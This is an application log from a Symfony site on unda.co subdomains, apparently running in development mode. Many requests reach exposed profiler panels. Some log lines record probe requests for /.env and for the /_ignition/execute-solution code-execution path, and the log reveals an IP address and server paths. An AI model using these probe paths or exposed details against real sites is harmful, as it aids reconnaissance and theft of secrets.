[2025-12-18 17:22:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 17:23:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=request","method":"GET"} []
[2025-12-18 17:23:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 17:24:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3","method":"GET"} []
[2025-12-18 17:24:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 17:28:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c79b71","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c79b71?panel=time","method":"GET"} []
[2025-12-18 17:28:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 17:29:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e17e24","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e17e24?panel=cache","method":"GET"} []
[2025-12-18 17:29:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 17:32:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 17:32:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=twig","method":"GET"} []
[2025-12-18 17:32:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 17:35:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c31f1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7c31f1?panel=exception","method":"GET"} []
[2025-12-18 17:35:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 17:41:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=cache","method":"GET"} []
[2025-12-18 17:41:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 17:45:11] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 17:48:38] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 17:49:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=twig","method":"GET"} []
[2025-12-18 17:49:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 17:50:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 17:50:21] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-18 17:50:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 17:50:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 17:50:21] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 17:50:21] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 17:50:21] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 17:50:21] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 17:50:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d8e76d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d8e76d","method":"GET"} []
[2025-12-18 17:50:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 17:51:55] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-18 17:57:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"819624","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/819624?panel=cache","method":"GET"} []
[2025-12-18 17:57:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 17:57:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=cache","method":"GET"} []
[2025-12-18 17:57:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 17:57:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e80d5b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e80d5b?panel=form","method":"GET"} []
[2025-12-18 17:57:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 17:58:37] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-18 17:58:37] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 17:58:37] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 17:58:37] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 17:58:37] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 17:58:37] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 17:58:37] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 17:58:38] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-18 17:59:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89abd5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/89abd5?panel=form","method":"GET"} []
[2025-12-18 17:59:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 17:59:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"bf2808","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/bf2808/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-18 17:59:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-18 18:01:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 18:02:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 18:02:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-18 18:05:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=config","method":"GET"} []
[2025-12-18 18:05:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 18:06:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-18 18:06:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 18:06:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 18:06:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 18:06:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 18:06:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 18:06:36] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 18:13:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=security","method":"GET"} []
[2025-12-18 18:13:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 18:17:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 18:19:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-18 18:19:24] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 18:19:24] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 18:19:24] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 18:19:24] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 18:19:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 18:19:24] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 18:20:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=request","method":"GET"} []
[2025-12-18 18:20:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 18:28:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=time","method":"GET"} []
[2025-12-18 18:28:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 18:29:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b3e983","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b3e983?panel=time","method":"GET"} []
[2025-12-18 18:29:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 18:32:58] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-18 18:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /p/u/doAuthentication.do"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /p/u/doAuthentication.do\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 18:34:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d9ab8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1d9ab8?panel=exception","method":"GET"} []
[2025-12-18 18:34:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 18:36:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=security","method":"GET"} []
[2025-12-18 18:36:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 18:37:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=router","method":"GET"} []
[2025-12-18 18:37:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 18:38:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f750b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f750b2?panel=validator","method":"GET"} []
[2025-12-18 18:38:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-18 18:40:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 18:44:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=request","method":"GET"} []
[2025-12-18 18:44:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 18:52:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=time","method":"GET"} []
[2025-12-18 18:52:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 18:53:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"becd18","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/becd18","method":"GET"} []
[2025-12-18 18:53:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 18:57:20] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"HEAD"} []
[2025-12-18 18:57:20] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 18:57:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 18:57:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 18:57:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-18 18:57:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 18:57:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 18:59:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=twig","method":"GET"} []
[2025-12-18 18:59:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 19:07:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=time","method":"GET"} []
[2025-12-18 19:07:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 19:12:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6442c4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6442c4","method":"GET"} []
[2025-12-18 19:12:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 19:14:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"db61c1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/db61c1","method":"GET"} []
[2025-12-18 19:14:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 19:15:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
